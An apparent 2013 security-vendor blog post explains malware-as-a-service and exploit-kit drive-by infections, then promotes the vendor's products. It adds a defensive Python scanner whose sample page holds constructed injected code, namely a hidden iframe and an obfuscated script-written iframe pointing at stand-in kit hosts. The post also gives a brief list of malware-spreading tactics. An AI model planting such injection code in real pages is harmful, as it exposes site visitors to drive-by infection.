Wednesday, 4 December 2013

Malware as a Service

Cloud-based services are all the rage these days: nearly every kind of software service is now offered as a cloud or software-as-a-service product. And when we say every kind of software service, we do mean every kind, including malicious software services. Malware as a service has become by far the most common way that malware is distributed. Here we’ll attempt to give a non-technical overview of how this industry works.

So what exactly is Malware-as-a-Service (MaaS) and why is it used?

Malware as a service is essentially an online service used by people who have written a specific piece of malware and want it distributed quickly. What the MaaS does is take the headache out of distributing the malware. Let’s say you’ve written your own malware program which you want to distribute. You could do a few things to help push its distribution:

1. Infect pirated software with your malware and upload it to common piracy websites
2. Create a website which invites visitors to download something fake which in reality is your malware
3. Make the virus self-replicating and distribute it via some kind of software vulnerability
4. Infect your friends’ USB sticks with the malware and rename it to something which they are likely to open

As you can see, all of the above either require a significant amount of effort or are not really effective. MaaS offerings, also known as exploit kits, allow you to distribute your malware at a very cost-effective price. If your malware is going to give you financial benefits, then a MaaS service to distribute the malware widely will be very handy, and very cheap. Quoted prices from certain exploit kits start from as low as $50 for using the kit for a day, up to $1500 for a year’s service, which is very cheap considering its effectiveness.

But how does the infection happen?

There are a number of steps involved in infecting a user. Let’s say that you don’t want to go through the above processes to distribute the malware and you’ve decided to use an exploit kit. After paying for the service, the following will happen:

Step 1: Your malware is loaded onto a distribution server ready to get deployed to new victims

Step 2: The MaaS authors discover web servers of legitimate websites which have problems or vulnerabilities in their setups. These vulnerabilities allow the MaaS authors to inject a piece of hidden HTML code which will be used to perform certain malicious actions.

Step 3: A normal user visits the legitimate (but compromised) website. The hidden code analyses the user and detects what browser and other software they have installed on their computer. If the user has software which has not been patched, then the next step is executed.

Step 4: Based on the analysis in step 3, the user is redirected to another website which will use a targeted exploit to infect the user with the malware. As an example, if a user has a version of Java which hasn’t been updated, they will be redirected to a Java exploit.

Step 5: The exploit is executed, which deploys the malware using the unpatched vulnerability.
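Seen from the defender’s side, the “hidden HTML code” of step 2 usually takes the form of a tiny or invisible iframe, or an inline script that writes one, pointing at the kit’s redirector. The following is an added example (not code from the original post) that scans a site’s own pages for those injection patterns; the page content and hostnames are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (hypothetical hosts): a legitimate shop page into which
# a 1x1 hidden iframe and an obfuscated script-written iframe have been injected.
SAMPLE_HTML = """<html><body>
<h1>Welcome to Example Shop</h1>
<iframe src="https://cdn.example.com/widget" width="300" height="200"></iframe>
<iframe src="http://redirector.invalid/in.php" width="1" height="1"
        style="visibility: hidden"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://kit.invalid/x%22%3E'));</script>
</body></html>"""


class InjectionScanner(HTMLParser):
    """Heuristic scan for the iframe injections drive-by kits rely on."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host      # the site's own hostname (assumed known)
        self.in_script = False
        self.findings = []              # list of (kind, detail) tuples

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self.in_script = True
        if tag != "iframe":
            return
        style = (a.get("style") or "").replace(" ", "").lower()
        tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
        hidden = tiny or "visibility:hidden" in style or "display:none" in style
        src = a.get("src", "")
        host = urlparse(src).netloc
        if hidden:
            # Hidden plus off-site is the classic exploit-kit landing redirect.
            kind = "hidden-offsite-iframe" if host and host != self.site_host else "hidden-iframe"
            self.findings.append((kind, src))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Inline script that writes an iframe (often via unescape) is a common obfuscated injection.
        if self.in_script and "document.write" in data and "iframe" in data.lower():
            self.findings.append(("script-written-iframe", data.strip()[:60]))


def scan_page(html, site_host):
    """Return the list of suspicious injections found in one HTML page."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_HTML, "example.com"):
        print(kind, detail)
```

Run it over the HTML your own web server actually serves (not the files on disk), since injected code may be added at serve time; anything flagged deserves a manual look rather than an automatic verdict.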

The effectiveness of the distribution is due to a number of reasons:

1. The sheer number of compromised websites (millions) which exist on the internet right now, and which will keep getting compromised in the future, allowing a huge audience to be exposed to the malware
2. The fact that these sites are actually legitimate sites which normal users will visit – they have just been hijacked with some invisible malicious code
3. The delivery of an exploit targeted to the specific user’s unpatched software – they will attack the user with an exploit which they know will work
4. The fact that the exploit does not need any kind of additional user interaction such as a click or a download. Just visiting the website will result in an infection (what is termed a drive-by download)
5. The lucrative business of MaaS, which allows the authors to keep expanding the sites they use, the exploits they use and their AV avoidance techniques
6. The use of spamming, SEO poisoning or other techniques to push users towards the compromised sites

How effective are these kits? And how many of them are there?

Very effective. Different security vendors quote different numbers for each kit, but all of them agree on one common conclusion: the malicious websites used by these kits make up the absolute majority of threats in the wild today. The majority of infections which happen today are coming from these exploit kits. Old viruses and distribution methods have become insignificant when compared to these new malicious URLs. There are tens of exploit kits out there: the Blackhole Exploit Kit used to be one of the most effective (though the author, Paunch, has reportedly been arrested and the kit is no longer being updated), plus Neutrino, Glazunov and many more. As the business gets more lucrative, the MaaS authors get competitive between themselves, making improvements in all aspects of the kit, from usability and price to infection and obfuscation techniques.

Ouch! … How do I protect myself and my employees?

Essentially, you can never know or keep track of which legitimate websites have been compromised, so you need a little help. You’ll need to put multiple mechanisms in place to protect yourself and your employees. First, you need to make sure all the browsers and software on your users’ machines have been fully patched; LanGuard or GFI Cloud – Patch Management is an essential tool to help you with this. Second, you need to put web security software in place which stops users from visiting websites which have been detected to contain malicious payloads. GFI WebMonitor and GFI Cloud Web Protection will both protect your users from visiting these websites. Thirdly, you still need to have anti-virus on your machines to ensure that malicious software payloads are detected and stopped; GFI Cloud – Anti-virus is the right tool here. If you miss any of these protections, it’s only a matter of time before your users are exposed to something dangerous without their knowledge.